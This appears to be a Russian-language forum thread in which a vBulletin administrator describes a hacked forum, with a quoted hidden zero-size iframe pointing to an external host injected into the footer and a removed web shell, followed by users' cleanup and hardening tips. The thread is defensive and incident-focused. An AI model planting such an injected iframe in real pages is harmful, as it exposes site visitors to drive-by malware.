История: профили на форуме перестали открываться, пишет Пользователь не зарегистрирован и не имеет профиля для просмотра., перестал работать переход по страницам в темах, дальше первой страницы не откроешь. Админ нашел в футере PHP: <iframe src="http://drh5.usfreightways.me:38/mean.php" height="0" width="0"></iframe> В файловой системе нашел и удалил шелл /vb/exception/model1.php по логам залитый 12 мая с IP 46.4.194.178 Разумеется были сменены все пароли, то есть у админов, фтп, к БД, к пользователю БД, и вроде как все стало работать. Но вчера опять всё повторилось, в футере ничего нет, в файловой системе пока не смотрел, новый пароль только у админа, и вряд ли так быстро можно было его подобрать, пароли не из легких. В общем что делать? где еще искать уязвимость?
значит не все закрыли... попробуйте менять пароль после того как все почистите... есть вариант, что стучалка есть - вы меняете пароль, она его отправляет, потом вы ее удаляете, человек заходит, делает свои дела и снова ее ставит... а вообще, через тотал командер заходите на сервер и смотрите по дате изменения файлов, так же можно сделать поиск, по всем измененным файлам за последний месяц. два или больше. а потом сверять с оригиналом файла. и получается что он вставляет свой фрейм, который не понятно что делает, так что сразу удаляем, потом меняем пароли
больше вероятность что админ что то пропустит а не валидатор, тем более валидатор как бы реально от DGT
здесь все может быть, может и человеческий фактор сыграл и все ровно, я бы так не надеялся на эту софтину иногда, эти "реальные" софты и сливают инфу или с помощью их еще вариант, если офиц. форум с лицензией то при наличии обновлений - обновится
вариант с лицензией отпадает буду надеяться что с доступом к фтп админ все же что нибудь найдет, иначе нахрен этот vBulletin
Меняйте все пароли, админка, ftp, mysql. Посмотри на наличее уязвимостей в модулях, это все ищется через google.
Есть самые простые правила безопасности для воблы - переименовать папку к админке - убедитесь, что у Вас в настройках включена защита от подбора пароля - убрать права аккаунту с ID 1 - дополнительно запаролить админку
С этим всем всеравно пройдет через некачественный мод типа чата. Но на прямой взлом начинающих взломщиков отпугнет...
У меня была подобная ситуация на вобле 4.1.4, форум ломали вставляя фрэймы. При удалении появлялись снова. Обратился на форум по вобле там посоветовали обновить до версии 4.2.2., я так и сделал, но это ничем не помогло. Вредоносный код, насколько я понял, был вписан в sql, и хакер всегда менял шаблон FORUMHOME, при чем после удаления вставок, они потом снова появлялись. Вопрос был решен установкой мода debug module admin cp. Хотя даже после его установки я 2 раза тоже удалял iframe, но все равно считаю что этот модуль мне очень сильно помог.
